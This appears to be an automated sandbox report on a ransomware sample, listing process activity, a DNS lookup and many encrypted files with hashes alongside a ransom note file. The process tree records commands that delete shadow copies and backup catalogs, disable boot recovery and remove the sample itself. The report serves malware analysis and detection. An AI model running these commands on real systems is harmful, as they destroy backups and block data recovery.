| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe
"C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 20 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe"
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 20
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplo.ru | udp |
Files
C:\Users\Admin\Desktop\resultlog7.reg
| MD5 | 5ccf0d958f73a0913f0afc2e41e7f36e |
| SHA1 | 157346737b77cb3b2b76606b6db97024d49e1de1 |
| SHA256 | 067ef94254e8cd23ea0e117f5a047320c266a917c542a6f3f480d28d5b9d5321 |
| SHA512 | 8961b21227a6fd0c45c80b7f9675290325078af4f6b96f654f4962963f0abe476a133fb7b20cc3145c235b76641f476f165d453aa80ade3173cdffd93ebf74ba |
C:\Users\Admin\Desktop\resultlog7.reg
| MD5 | cae30cd47b6665a5d5a40e1a11a598ee |
| SHA1 | c83d5be1691c5c192504a9487323fc054b146069 |
| SHA256 | d59767e5c7cd196bae1ee82af15f1e064b6b48f719cec132aeae848210cddc0e |
| SHA512 | 7d2f7dd71ddabd903c02299ab65bc853c7af8a5280cc9cac1db1c1893d19322cd01242a206f2194b593ef01234708c3d76c14b3aaa43267b31e8a52258e70364 |
C:\Users\Admin\Desktop\resultlog7.reg
| MD5 | f99ae366a00221c25775ca62d5dffdd2 |
| SHA1 | 3813d1cd06c3a3e3e371c272248c8b5f452c3f34 |
| SHA256 | 8d125ae61152b5e1ae04ddbda6074ba2997dc3f258c2b27f886ad39e64e8c2a2 |
| SHA512 | a1dbc2e9661e02bbd0f693ea554fb705d4ee57c8cd4158b269a5f91487e7b233afc671dcaa6c96b268e8cc834ac8cc063fad6474470decd84e8cd2b1ec976ce0 |
C:\Program Files\Internet Explorer\SIGNUP\Restore-My-Files.txt
| MD5 | 43dc256158b2798f20019a8009abf331 |
| SHA1 | 1464661e78d8136332fe3c04bf7aebbf9ae9f518 |
| SHA256 | 48c0fab32a67b01773f34c4203b51796719eae7a01b71c60f903366d4072a1d4 |
| SHA512 | cad7014cecddd238e22050b661566a4e214644eff666d0d0ff0ba127db76df4e15884399015d4b6471210ac444afdbe6753489925a68f3df172052f2db2e224e |
C:\ProgramData\Adobe\Updater6\AdobeESDGlobalApps.xml.abcd
| MD5 | 988e7d1d9b27930203be9960c704200d |
| SHA1 | 58f66b8b4c4698f96db34c91d776ba50a988b4b4 |
| SHA256 | 4f6fe75d0d1bac2d7f279804242fb2c51420da061860136f4c354d363089e3be |
| SHA512 | 6e726f7afae25d48793fff209d35e56e3f6b76a8bd1ca02ce278a55cab01e631b00b0b08fab1ec988392527ca0a807117da24cfe877d9b8ee1a56b7671d5c834 |
C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata.abcd
| MD5 | 24f44e24669a8ea95ab4f2607110b6b4 |
| SHA1 | a54b4f32d784df864f4ef1d05a7e829dfd59c3ed |
| SHA256 | 4dabd2c128e776ce59bda5cfaee9920962954809ab9d913c5700df43d09c95dc |
| SHA512 | 2397b21d3c92f5cd356a7e73f077b56e57f3209b3762a93c4f5f17b4ffbcfc4cb6842525afd3f4857b48c04ecbd399cb56ecff1b5607822f840658cbcaafa8d5 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\ENVELOPR.DLL.trx_dll.abcd
| MD5 | 7c35ed23423c761f8a9c2673453f0680 |
| SHA1 | 5486099c7b8b33d37e9087b8660dd475cfbe60b8 |
| SHA256 | db692a793aa0cc1a53db2200736f6530f2a6a77a4f20175a50af666e50c6830c |
| SHA512 | 6d7ae32c56077b753ff735d0444156dcbd481008b1ea7a26e8d2bb345592b36acd8466bc5949c1227ebf79306fde65c0acaada3477d14f42fef4507e763f966b |
C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm.abcd
| MD5 | 6565717755c6241c7da522e7f43b37a9 |
| SHA1 | 140f135572526571b68c6fc0dc6a5a5e528e9607 |
| SHA256 | 763af1a00c9c46c80c3be72662020364d49021e3478418f17644e060a2601275 |
| SHA512 | 5affeb8f12b3dd0ee351530e18b5b3702a3d85ef3946bfe48131271cd800f3a0fb04cfc38663870629c5312d51d2b9bb3c9b1393ba9523394bb18cb78dc323d3 |
C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm.abcd
| MD5 | fa8ca7e5aca769dda8c6dff23d447294 |
| SHA1 | d0af2417f296aca90f50d364b970fac791d54d30 |
| SHA256 | 75455a5632910aeff3bc92843350c84eb61d3b504cdafd9ff5e40c829b32b9af |
| SHA512 | fc437ffbd1017abde9017677455af2f025df6ba2212c35414ddce87272cf2deb1de9a8302459ef3ec9c52d822eae637727a82bffa5d501c0f59a0b4b28d50cea |
C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\state.rsm.abcd
| MD5 | 9a16f0fc3be911d2a988c816f1d958d1 |
| SHA1 | 667ab8f21fec343db59fe4c441020d4f8dde282d |
| SHA256 | ea98425f587f5f35f9fce03ddcaf2aa716eae3cb263921ea6d758ac5cb1c1bd7 |
| SHA512 | f6d777f9ad70e36ade006c50c6ae2783aebff5736d45eca436b72d199bf996a1670eaadd941927bff969f7887d45a38a3a4324829c948fa34e43ec0d76e29f1c |
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\state.rsm.abcd
| MD5 | 6d8a79ab1dd68c723f7345fb125f71d8 |
| SHA1 | e0ce123f4d799fa4d130130c3c56d26ab20bc818 |
| SHA256 | e87237846432319a9230261a14bf09d33473cb27215c5a8dc24a7bf57941ae90 |
| SHA512 | 25717c02fb964ff86709e3c9065887b24cb5b2fe7e3fc8474bb890e33393dede43b5bb10460a8b6a96842e5d27c587c04a1c896f2a599d4eb7d17c82429c72c1 |
C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\state.rsm.abcd
| MD5 | 5791fdacdfc62fcc61250216fe58f68e |
| SHA1 | 027e1652fef0b86381e2df2edde203629ff065db |
| SHA256 | 32a473b74ed079dc4af47161c9e6cc7b0e7f2dc14d48cd129cb24426d899600d |
| SHA512 | bb0c5d201f492c4a757cbac76106870a9500f6efc36d76d249246c83ddca1fec39a2a0b101b63289cbec3a8e4783c4632cf160ac0db7bd48e51189b972e780a6 |
C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm.abcd
| MD5 | 6117436b0ea626718fa9150f6476ec9a |
| SHA1 | a21777760e82a12d65afe971555b575260c60ce2 |
| SHA256 | 50e66e36842af84dda93c23a2980539ec686041183172c36eb110513dd062a71 |
| SHA512 | 1fbc9873192addf1970c06affb77b2f8c865bca6a349e54c939f9e08a1bf9e87e446266bcb8d29070aa65b7a48c8d419c4d169653782418371ebce991f6f0e97 |
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json.abcd
| MD5 | 64878f1eb286ada3872dfe903a579fa8 |
| SHA1 | 764d57579869b44eb89898e969c31e659151d6d5 |
| SHA256 | 1106ff3c16c9eceb02d7c6425d9b4f9e3c20cf869077c57259345e7001e544d6 |
| SHA512 | b9a26260adccd569c76b238cc7b08e8dbbd38f872b55df302a0f89be9d40ff3803c3eceb5648d517b23f9ebd79377171fceb60d6936c28ba0ebe6270fe6695ce |
C:\ProgramData\Microsoft Help\nslist.hxl.abcd
| MD5 | 57124231d6732af93660755f6bbafa8b |
| SHA1 | bb32ab3f9da220cb7ccd7ca2d87adc303e72b738 |
| SHA256 | 7234e2b3b3bd2f85c7ae29eb4133dec9d4f91f62bd1cb7b3c433e499f6eeb9f2 |
| SHA512 | dbf8663fcf7a5d4de47bb9a5d047a87e5396427224b1ee56312b48980ace2af5992b0dc31e7ce9b85dece2d720674819c5940eba8de0d79e70b4785b0cbc8f8d |
C:\ProgramData\Microsoft Help\MS.WINWORD.DEV.14.1033.hxn.abcd
| MD5 | 36cca171a30b8374232747685d62ccd1 |
| SHA1 | e0f2d86b52abac4709551aae43be1955a28f684e |
| SHA256 | f7d5c1432261ea862b58b15cd3370de98adc3e0e4e2098007c551797cea8e54f |
| SHA512 | 34c6c626f47c8c29eb5b68598649ac16399057c9b1bf9f6fc76c0b9f32ce29e65013012a4d5ed0da0caab370f7e85c667b351a5c57c930ed1a9804f37be56187 |
C:\ProgramData\Microsoft Help\MS.WINWORD.14.1033.hxn.abcd
| MD5 | 8b3e114681b2b65316a8f9f93e79ca66 |
| SHA1 | 7f6022ed6f44d88388379481675d3bad62b684e1 |
| SHA256 | 75c3b2b27a4ce4af8e9ed44cee0be15c46385fcfe80ac27c55705de1dc93b9fe |
| SHA512 | b072ad149e2f32825a5e9ebcadb65d0fdaa0354de679e0a04bceed531a6943ad93e643a29beb2771b8dacbc9d4d54cd65007d7e8b985fce8332bebd7a2f4ca6a |
C:\ProgramData\Microsoft Help\MS.SETLANG.14.1033.hxn.abcd
| MD5 | c73e3f390680921cbe2c492d809e0bee |
| SHA1 | 08b9c9ea4280bbf58564dd2a47d78da8900112f6 |
| SHA256 | 99a4fcc77145e2ce0839972f9f65391462a4d7f28e33e6274ac6f3973d798b4c |
| SHA512 | c98ec1a5e1462348c6c074961b0de3317e293a1c4abc156d5d717b48f708dc0d4d992ed4e10806f48d0106970335582bd64cbb809aba46e8cffb835921530d33 |
C:\ProgramData\Microsoft Help\MS.POWERPNT.DEV.14.1033.hxn.abcd
| MD5 | 615996c9e26a63eab5fdeb152d4a7acb |
| SHA1 | 9762ecd3b714513a4f7da4a9ffa90a8af26c784d |
| SHA256 | 18912dd513c07a1637dddf7900c3ea99a788a983e0c87c8d512bef013f1ea333 |
| SHA512 | 3e2cde37c073e0bd6a27221ed4e838b150a8729bf9a5437ae834e858e17b22c205afc0e3ae714eeebd9f35f3f74efbcf4dbbcb43ee41308c6bd1e73a54769fe1 |
C:\ProgramData\Microsoft Help\MS.POWERPNT.14.1033.hxn.abcd
| MD5 | 6a4eb603f55641000bfa8d5fd50ffa56 |
| SHA1 | 2bc923760d94489b88837c5894f0e68b7f20465e |
| SHA256 | 331de21d06296b14470e477e486e42a23796feea166907f9419a2019c457604e |
| SHA512 | d41f10cd2dafe7ec722343d9de792d958b77f929de51bd6335fa3a0396a52e297ad638b1f4960c0c48773abef6fc3dbd5e8df55d09f53c1163be8d611ca776e3 |
C:\ProgramData\Microsoft Help\MS.OUTLOOK.DEV.14.1033.hxn.abcd
| MD5 | b0ab0298351561f54cb519d27946166b |
| SHA1 | f07b69f5020708ce8bc2eb9e1321cc066e90c9c6 |
| SHA256 | d05cb6f380ff68d038a9e0cfa7226b7378ac37f9070afdbd38588f8a8e9c8d61 |
| SHA512 | 104c6bec553b84f0d4831eea1df6dc2f232958e090fff71b864174b351b8bb8b1e13a6499536dd4a2ec941be8c68f5af6209f0fc526f3a1c670e5dbcc0d72a37 |
C:\ProgramData\Microsoft Help\MS.OUTLOOK.14.1033.hxn.abcd
| MD5 | b21e724e7adbf032db09f3bcb5515fe8 |
| SHA1 | 5eab72f7ac3baf940d33eef6d61ce521830c0498 |
| SHA256 | 21e5037eea14dcb9e27f674b39f9605627cd2c97865efbe6b90710c952472283 |
| SHA512 | 0a5bb61abdc5aaf944885799e6ae82f76fb861a70624a9ca02cc1419f817ad2f80257dc516466e1ed286ab2c315aab8e7ea70b62e02fd6655668e683e12e3b10 |
C:\ProgramData\Microsoft Help\MS.ONENOTE.14.1033.hxn.abcd
| MD5 | 06749e41185c79a84adeddf9c0d4c618 |
| SHA1 | c93129b8d70a4f4245c5d0521326ff2aa26b3f89 |
| SHA256 | df2f1e3dc4ab9cfca47c1231d21697d6f58dfbbe71c73428ca8172094a891fff |
| SHA512 | e122b6ca7d812a7ffb5ce19f77c0c9d8c735cd9edc2d3d23f9761f65d2deed58d2df8acc2cac9d694beb07fa50f9a1fd2e75f2aed128b8cda14980719fe7212e |
C:\ProgramData\Microsoft Help\MS.OIS.14.1033.hxn.abcd
| MD5 | fa218bd4abd415895e2c13e007b6631e |
| SHA1 | 266394b4948942b93e05d8b67dfb8a49f96e7d1d |
| SHA256 | 67b223bc591316137f9a5419e69bbdbeecbc76bc96fe5bb0ce7a697a7dae4f38 |
| SHA512 | d9fedc23a9899ce2f304b9f85c221113b4587996a80967acca4794b38177b54cddfc7f1f94c3e780298d414d50de6c474bc716d8b7636d4594527132e16cf126 |
C:\ProgramData\Microsoft Help\MS.MSTORE.14.1033.hxn.abcd
| MD5 | 0c576ef27261f6d783db3a749023bb00 |
| SHA1 | f99f68c688061bd5c0eb2606b447a28e53630aaa |
| SHA256 | 6a87c8b1368b584b20b9e5131692360ca4423b8d7265ea46f713990e027c7c27 |
| SHA512 | f2d6f833c33bfee857fefd00dcd3b28b63dad4c18644deb9ca8db5fcde2a997b7bffbe068842cfcc74a2d02121d732f9a31f71050a3b8088611e7fe23657055e |
C:\ProgramData\Microsoft Help\MS.MSPUB.DEV.14.1033.hxn.abcd
| MD5 | 5db4b1621f2a805b6db3c3b63d17f0cb |
| SHA1 | 0ddce264af16e885c4a3f5802b32caa442761a3c |
| SHA256 | 37c482bbf7f9ff9c96b1c22be6e9a8d137bf95b80057f0d1e2d59426cbfb8e56 |
| SHA512 | 6a752bb05a93d2482b34d9204e50e07de1403f17e4bca6d2cf0d44eb6d4b54757b9f66e855098659cab3bffe2e6edf525f7bf011c1b161b37c10d057894aaabd |
C:\ProgramData\Microsoft Help\MS.MSPUB.14.1033.hxn.abcd
| MD5 | f24a2a34fadcea3c63f04dec70422edb |
| SHA1 | 9155df069f7c3f9f26fe491d865fadb9fc46616e |
| SHA256 | be56d529b56a503f58243f1dc469b7520cb52c35cb31c493ef0dcc48728da08b |
| SHA512 | 534286fd546c4c92534bbe431f6bc8c5063379c8dc668c63644b5ea07ce7e2888141075d4b5db2194830a7214e69037b10cdf919eba97743df81eeb6cb24b8b0 |
C:\ProgramData\Microsoft Help\MS.MSOUC.14.1033.hxn.abcd
| MD5 | fa56981bb77fe37406c38c9a71414ba0 |
| SHA1 | 23cba7cefd292e03c5f3e4d8a4aa8e5c3da3fb79 |
| SHA256 | 682217f7ab878e8d5a7dd9ac36ea2d17f8560ebc153dfffaf99ece6efa5d4620 |
| SHA512 | dd592bfdb6ffd384d4fb41e30fb4e495c9932f515ab9eb1d5bef53bf102133a055c439cfd35b97cad0c03062d9ab7930f7e5a602035dd54ddc98a8a3f074fa41 |
C:\ProgramData\Microsoft Help\MS.MSACCESS.DEV.14.1033.hxn.abcd
| MD5 | 4f49271c560a402e7cf6f46086aec8ed |
| SHA1 | ce35970b437810cbbca14657d5bc3076b37d1c8f |
| SHA256 | c2e1d30f1891898b16e2f39395b78424b2e3eb6a6aeadf395462b124d1930c3f |
| SHA512 | 2c8e6701a4520be0aad41f3ffc30c10b602b5fda9990325067aaa215e7d5a0f2b5ce9e151bdfe52859d1f2ca9a25d60de5e89709ad62623c0cce5466783ef72e |
C:\ProgramData\Microsoft Help\MS.MSACCESS.14.1033.hxn.abcd
| MD5 | 7daaeedf34cf359e431e8646e2e1accc |
| SHA1 | 3650a6952ec9f148a750c44482cf2c1e8c719efe |
| SHA256 | 598f9171c005fb0bd3be71230e87867ee43f0b644b7da001b2aca9463036b36f |
| SHA512 | 331de9f788f640e77f64848c8594532d2f200ce19286a2dcfe06894540b7d700f93c9a3357f1011555e4c3d65e43d7e0091ccdc53d9e84d2c82d42342048e04e |
C:\ProgramData\Microsoft Help\MS.INFOPATHEDITOR.14.1033.hxn.abcd
| MD5 | 4abf418aaff4d64928d4880e080c1b74 |
| SHA1 | fec659ca7bfc27da751b7dd4c5c6dea2b8ac8cab |
| SHA256 | 17bce314dca9b23e299c3faae880bdb39cd2523c41b393752b91623550774c28 |
| SHA512 | d048ebf6551d62908cb013802fb829202bf1ab199e429ea2c248dedc2c198a50223357a1d75a3d7d878da0f59e52d032ce8f867765aacf9ee14859cbfbe33145 |
C:\ProgramData\Microsoft Help\MS.INFOPATH.14.1033.hxn.abcd
| MD5 | 378fa2c41b38caae7031575d21f2b254 |
| SHA1 | 99bf5b8cfb56a6d7fe1462c14e81c193330cbb22 |
| SHA256 | a936d71e1656f1cf2183165607669a3e49b3c09615e2ff57732b97be3bff7398 |
| SHA512 | 1f151e7c95911f5aed22bc7d539896b050bf199b770ce5eb1f6a5bee901936a29df47155eaba2a9a25383e63af2527b5c59010d18ea2e3be482a26de41bdf71c |
C:\ProgramData\Microsoft Help\MS.GROOVE.14.1033.hxn.abcd
| MD5 | 3bcc07fc0a4e3ba8963f09dc8424d389 |
| SHA1 | cf9cea4682ab45d3cbef6bf8e50027989c6bd240 |
| SHA256 | 7aaedc40453a0914ca5314fcf786ab44d676303761dd406d3fd7d20082917c28 |
| SHA512 | 1b0c89207af3ee9f2e0d65ab8cbdb2e529e3c796384a5e3a5fc2ae60102f5a9514bebdc741d0c64747919d2f326dc7fb8c1f89274a302bfdac8bac9f753d40fd |
C:\ProgramData\Microsoft Help\MS.GRAPH.14.1033.hxn.abcd
| MD5 | 2d2aa44f607dd58df336409284657cc5 |
| SHA1 | cfb440c59ac3a71ac77410174e93ba0f33f4a9b4 |
| SHA256 | dcdf0bf318396a86982c644b0f196cc508567e1a874a2f6b239f3b2132d84dad |
| SHA512 | ba60e3362784f035c7e721c2b65fe801c026817d3ad530d7a4d67b88ea54b083a8924085dd1c5361bd74daec7fbaaff5a2148eba96cf96e224b5bdfb65e7aa9e |
C:\ProgramData\Microsoft Help\MS.EXCEL.DEV.14.1033.hxn.abcd
| MD5 | 69dfcb8aa04ecaf63f19a35044163363 |
| SHA1 | d1bd29c4d76dbd2e52dc74e6a0685d8b0417c1f1 |
| SHA256 | c1106655506a827bbfbb1c7ab412c3cf1a5367dc1f31e423490619f62d4a684f |
| SHA512 | 437cbeef315370f3e3c694c0a27f9ae414bb7314a84c4cf471f6a62b7a55510803d7fd888907e01a3b6124e997c36b301130938f771f5a182dfa85f3eb6196bd |
C:\ProgramData\Microsoft Help\MS.EXCEL.14.1033.hxn.abcd
| MD5 | bb9e8a1f8d590103b14d9ac53df50366 |
| SHA1 | 12a4426ce1dd53a938a257bd07755d75e5e95355 |
| SHA256 | 065d0bd5f36173d4daeb8e457a1c2180c8169bba684906463e20bfd89a4aa403 |
| SHA512 | 937ab8cd7821ad32e8d9a93f7249b7b091d0f56dbaf605077de95e3fd7040ef744669f0ec7c7e63a81585439d904d82843c20cec3e540814ff771c70c152985f |
C:\ProgramData\Microsoft Help\Hx_1033_MValidator.HxD.abcd
| MD5 | f473a64d3fbe489fb04b0942b4051fac |
| SHA1 | fa257e15d84cf9a7e6f4a2a99b2d9e1162ff630c |
| SHA256 | 0e785497f227e9e0fc6888c390dcb1180e25a17c7a644ef1352900cf1baeabf6 |
| SHA512 | 4ae6a0cdf3629020ab26508893173979163335353632754ccea57823b3c9af36ba7b6e36e7c2e44531b537fffb6df1d49578d0888270f5f38bdfa41c51cb7fb3 |
C:\ProgramData\Microsoft Help\Hx_1033_MTOC_Hx.HxH.abcd
| MD5 | ec217fb3f30bb3533fb4208232fdb041 |
| SHA1 | 1a5a3da718fe865a4cb63b12dc8efbe6ca378742 |
| SHA256 | 11993c04f56d0b3c22b55888e8024a281912d314d5c299aaa6c367dc41b2b407 |
| SHA512 | f05b0584a777f0e27aaeb613ce338433d42a778467dd751100eb333048a257b863b49d657c793520271e73086d9885827b9a8d745ac17f5a5151bc415d583450 |
C:\ProgramData\Microsoft Help\Hx_1033_MKWD_NamedURL.HxW.abcd
| MD5 | 3d99065a7f1ff49740b46ab78a05f176 |
| SHA1 | c09a568a33fef9758ee81169cc9dc00dc81b1cfc |
| SHA256 | 31fd2e40dde8652a3019b27215f1937a94746d28a397948b2eac65178655b1bb |
| SHA512 | 505289beba0a17c66b0ebb3017c879df883e4e7ee67bd95a5e43ee9603f9c06eab335c87e5420346492e91966aa7271709ff30729d4084165e403c73473927ce |
C:\ProgramData\Microsoft Help\Hx_1033_MKWD_K.HxW.abcd
| MD5 | 6b66dfa210a5ce9bf1f3db92e6cbb3a4 |
| SHA1 | b2e9878311442172bb016da5980cb2d5b9e2945c |
| SHA256 | 2169a1906838e6b0bda926f97d76a89c09a27f174c7a93513d9ce55ddcb33d1f |
| SHA512 | dd2534196d8420ec892c4730973465b6440f43b38986b7306aa91f14917101d10ab2b38f9e33e48b4c28802173f84e187b6630c4fd71b213575a95b415c164c3 |
C:\ProgramData\Microsoft Help\Hx.hxn.abcd
| MD5 | aa2661a1f11e8bba0090afae21ec69be |
| SHA1 | cd4d24fb885755e3c30dc062f8de9dced77a49d0 |
| SHA256 | d6dadd4bd46d3ad2cb4a48dcf4c585df46aa9a5902ed8c176c234f5c46caa0fd |
| SHA512 | d9830134d2313a13170e53ab695f790b94038d89c5b948b93a54992773aab47ccaa3c2e225114ac5293772347f83be01d7e4050ab336f4db0d76d4c5cb723e64 |
C:\ProgramData\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log.abcd
| MD5 | 2a5d86aa5e18af7282b13f310288cd74 |
| SHA1 | be1c6a011976eddb5f1cfbf8f7d723ea19427cdc |
| SHA256 | da487d92bcd19d375028323a4cb05e6367f4dc3fc51bbd7b0bd3b2b974defeb8 |
| SHA512 | 28b2cbbcfeda65d7f20953db59949e21870611114783367ce687067b3b6bb772151bf2665e06a4cd75716ca224e302a1b95495d8bb8e8f01781b56b97a834a50 |
C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm.abcd
| MD5 | 11be1344811d9db88feeec51469dbd05 |
| SHA1 | 284f91dcd519c713389c1329108b28c41a19ccf1 |
| SHA256 | db171319d7d8102fb3411ed038ff5787f53901e569ac584d8b70ecb3d4afc774 |
| SHA512 | a289c75f3ae8b0296b918c34376a2fa99ec499f49bf803eef846c33ee68c05a10c6009ab885443f56cf6bdf3241f51bdf4ef960309dabcb7796dc272557cfb54 |
C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm.abcd
| MD5 | d0be24199cd2676976051454729882fa |
| SHA1 | 065190a0e790a1a6c45ee533aaf457f1f9e1e8ee |
| SHA256 | a070a48461e53e62545a6b8bc2417c26459fd185b63e73c5f52d4a484345ff4f |
| SHA512 | f4cbf26b4358d121a6c4e4596d56355329f63d4105fa3c73c069908fee3816b90b730a8d18e7879a7ac8068976a119dcab894dcd8e03142ddc374df595741efe |
C:\ProgramData\Microsoft\User Account Pictures\user.bmp.abcd
| MD5 | 37efa63bd71c4b40f64110cdfecabfd1 |
| SHA1 | f68810d6c67e0defe3d76ee9fb8ee5b635039957 |
| SHA256 | e1f803dd35c7262cdafccc6d6180a656a6fa4eb66809fd6d2ab167b365930d0d |
| SHA512 | fa5ecb4f79487d3bfb530cab619ee754b362a9f8814371ecf80ca54ab248172190a90da605fd118053fd4bc704e581189217560fc81b8358a9bf7962f2b00d9e |
C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.abcd
| MD5 | 4a8e3c62079f0abcecbce8da98822c28 |
| SHA1 | 1c2cf02b2f7596c08ed13aec9a08d2bae61e2a6c |
| SHA256 | 28af2f2e79ca3bcb1fe59785953d8a42a2c83a3c300015d14d148f2d78a9f250 |
| SHA512 | b08956098058fa760dc9bc1bf39258370b4c9b080a9a7bbfcb3147e7061af983d1a81bd7e7c79a56aeb47b95d1185fbc435087904cfa11f996045e63f35efa25 |
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.abcd
| MD5 | 539987687cab99291bd8d9c0528ae2d9 |
| SHA1 | c71261b047b4923fa929b8572cea576f649aea9c |
| SHA256 | 899a27d181936002b426bc700200ae25af25888138440ed42ea3641d5a1d85e9 |
| SHA512 | 9d672ab538e1513d3e711d232c4c93adef7f91eb4d024fbe43aba7dedcd2095eb6d0f920093fbe1cf079bd0eeb55538ba50f4daedaf45ff0a269d5ebac8a35c7 |
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat.abcd
| MD5 | 39a7994ae84b538154587881d4e15baf |
| SHA1 | a51adef66a3def33c0ce2735c335a3194a8d164c |
| SHA256 | 00bc7e06c5fd5d15ca63341debddf0852457334d6e8b07f3a1e54b98efcaac4a |
| SHA512 | 256f090964f859907472a7efb4abbfc7aec84323512feba4c3c42ad8046a7b94b9e2fa03961f0a87feb376dec6f4b565901e1fab4e68faa5d80de054a54d4e36 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\XLSLICER.DLL.trx_dll.abcd
| MD5 | 9acc2d66d716653115f15181560a53f5 |
| SHA1 | 8fdd835116f5e07ad0263d41b01ba52242c0feba |
| SHA256 | 13f5a0010c56534b312646039b4b525d1e1cd6b73d673dd10510ced048e5e646 |
